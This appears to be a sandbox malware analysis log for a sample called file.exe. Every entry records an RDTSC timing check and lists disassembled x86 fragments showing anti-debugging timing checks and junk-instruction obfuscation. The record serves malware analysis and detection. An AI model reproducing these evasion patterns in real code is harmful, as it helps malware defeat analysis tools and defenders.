Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC173E second address: EC1742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC1742 second address: EC1766 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 jmp 00007F8C9923326Eh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8C9923326Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC1766 second address: EC176F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC27FD second address: EC2803 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC2803 second address: EC280D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8C98BA52B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7EC72 second address: E7EC98 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F8C9923327Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7F191 second address: E7F1A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C98BA52C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7F1A5 second address: E7F1AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7F2E5 second address: E7F320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push ecx 0x00000008 push ebx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop ebx 0x0000000c pop ecx 0x0000000d xchg eax, esi 0x0000000e jmp 00007F8C98BA52C1h 0x00000013 mov edi, dword ptr [ebp+122D27E4h] 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F8C98BA52C3h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7F320 second address: E7F326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7F411 second address: E7F417 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7F4E6 second address: E7F4EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7FC62 second address: E7FC79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C98BA52C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7FC79 second address: E7FC80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7FD45 second address: E7FD49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7FD49 second address: E7FDB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F8C99233278h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F8C99233268h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 xor dword ptr [ebp+122D2E3Ch], ebx 0x0000002e sbb cx, 5E97h 0x00000033 lea eax, dword ptr [ebp+124829DFh] 0x00000039 mov dword ptr [ebp+122D3255h], eax 0x0000003f push eax 0x00000040 pushad 0x00000041 jng 00007F8C9923326Ch 0x00000047 push ebx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7FDB4 second address: E7FE18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D306Ch], edx 0x0000000f mov ecx, dword ptr [ebp+122D1A24h] 0x00000015 lea eax, dword ptr [ebp+1248299Bh] 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007F8C98BA52B8h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 add dword ptr [ebp+12459997h], esi 0x0000003b mov dword ptr [ebp+122D17E4h], esi 0x00000041 or ecx, 73ECEE45h 0x00000047 nop 0x00000048 jmp 00007F8C98BA52C1h 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push ecx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7FE18 second address: E7FE1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7FE1D second address: E685B1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 or dword ptr [ebp+12454BD2h], edi 0x0000000f jnp 00007F8C98BA52BBh 0x00000015 add cx, 40AEh 0x0000001a call dword ptr [ebp+122D3602h] 0x00000020 push eax 0x00000021 jl 00007F8C98BA52BEh 0x00000027 pushad 0x00000028 popad 0x00000029 ja 00007F8C98BA52B6h 0x0000002f pop eax 0x00000030 pushad 0x00000031 pushad 0x00000032 push esi 0x00000033 pop esi 0x00000034 push edx 0x00000035 pop edx 0x00000036 popad 0x00000037 push eax 0x00000038 push edx 0x00000039 push edi 0x0000003a pop edi 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECB0E4 second address: ECB0E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECB0E8 second address: ECB105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8C98BA52B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007F8C98BA52BFh 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECB274 second address: ECB27D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECB27D second address: ECB299 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C98BA52C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECB299 second address: ECB29E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECB29E second address: ECB2BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8C98BA52C5h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECB69A second address: ECB6B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C99233278h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECFCF4 second address: ECFD23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C98BA52BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F8C98BA52CCh 0x00000011 jmp 00007F8C98BA52C4h 0x00000016 push edi 0x00000017 pop edi 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECFD23 second address: ECFD28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECFE80 second address: ECFE8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED287E second address: ED2883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED258C second address: ED25C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8C98BA52C9h 0x00000008 jmp 00007F8C98BA52BBh 0x0000000d jmp 00007F8C98BA52BDh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED5B51 second address: ED5B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED5B55 second address: ED5B74 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8C98BA52B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F8C98BA52C5h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED5CF0 second address: ED5CFA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8C99233266h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED5CFA second address: ED5D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007F8C98BA52D0h 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED9876 second address: ED987C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED987C second address: ED9882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED9CEF second address: ED9D01 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8C99233266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F8C9923326Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED9D01 second address: ED9D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnl 00007F8C98BA52D0h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED9D2D second address: ED9D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED9D31 second address: ED9D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F8C98BA52C0h 0x0000000e jnc 00007F8C98BA52B6h 0x00000014 popad 0x00000015 pushad 0x00000016 jne 00007F8C98BA52B6h 0x0000001c push esi 0x0000001d pop esi 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 push edx 0x00000024 pop edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDFE8C second address: EDFE97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F8C99233266h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDFE97 second address: EDFEAB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F8C98BA52BDh 0x00000008 pop ebx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDFEAB second address: EDFEEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F8C99233294h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDE754 second address: EDE776 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C98BA52C8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDE776 second address: EDE78A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C9923326Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7F86A second address: E7F86F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7F86F second address: E7F879 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F8C99233266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDEFF1 second address: EDEFF6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDF190 second address: EDF19D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnl 00007F8C9923326Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDF19D second address: EDF1A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDF1A1 second address: EDF1A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDF1A7 second address: EDF1AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDF1AD second address: EDF1B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDFBDF second address: EDFBE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDFBE3 second address: EDFBEB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE8C44 second address: EE8C4E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8C98BA52B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE8C4E second address: EE8C54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE8C54 second address: EE8C83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C98BA52C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jns 00007F8C98BA52B6h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jnl 00007F8C98BA52B6h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E46CBD second address: E46CC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E46CC3 second address: E46CCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F8C98BA52B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E46CCD second address: E46CDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jl 00007F8C99233266h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE6CD1 second address: EE6CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE6CD7 second address: EE6CDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE6CDD second address: EE6D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jl 00007F8C98BA52B6h 0x0000000c jmp 00007F8C98BA52C6h 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE6D04 second address: EE6D08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE6FE1 second address: EE6FE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE6FE9 second address: EE6FED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE7631 second address: EE7635 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE7635 second address: EE763B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE763B second address: EE7641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE7641 second address: EE764B instructions: 0x00000000 rdtsc 0x00000002 js 00007F8C9923326Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE78F2 second address: EE7908 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007F8C98BA52B6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE7908 second address: EE790C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE790C second address: EE7922 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8C98BA52B6h 0x00000008 jne 00007F8C98BA52B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE7922 second address: EE792E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F8C99233266h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE792E second address: EE7932 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE7932 second address: EE793E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE7BFC second address: EE7C1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8C98BA52C4h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE7C1A second address: EE7C2A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F8C9923326Ah 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE7C2A second address: EE7C2F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE7EC3 second address: EE7ECF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F8C99233266h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE86EA second address: EE86F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEBF0F second address: EEBF13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEBF13 second address: EEBF27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C98BA52BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEBF27 second address: EEBF2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEBF2B second address: EEBF2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEC083 second address: EEC089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEC1FC second address: EEC200 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEC4C3 second address: EEC4C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEC4C7 second address: EEC4D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEC4D0 second address: EEC4EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8C99233274h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEC650 second address: EEC656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF126F second address: EF1279 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F8C99233266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF8525 second address: EF8529 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF8529 second address: EF8543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8C9923326Ch 0x0000000d jno 00007F8C99233266h 0x00000013 rdtsc
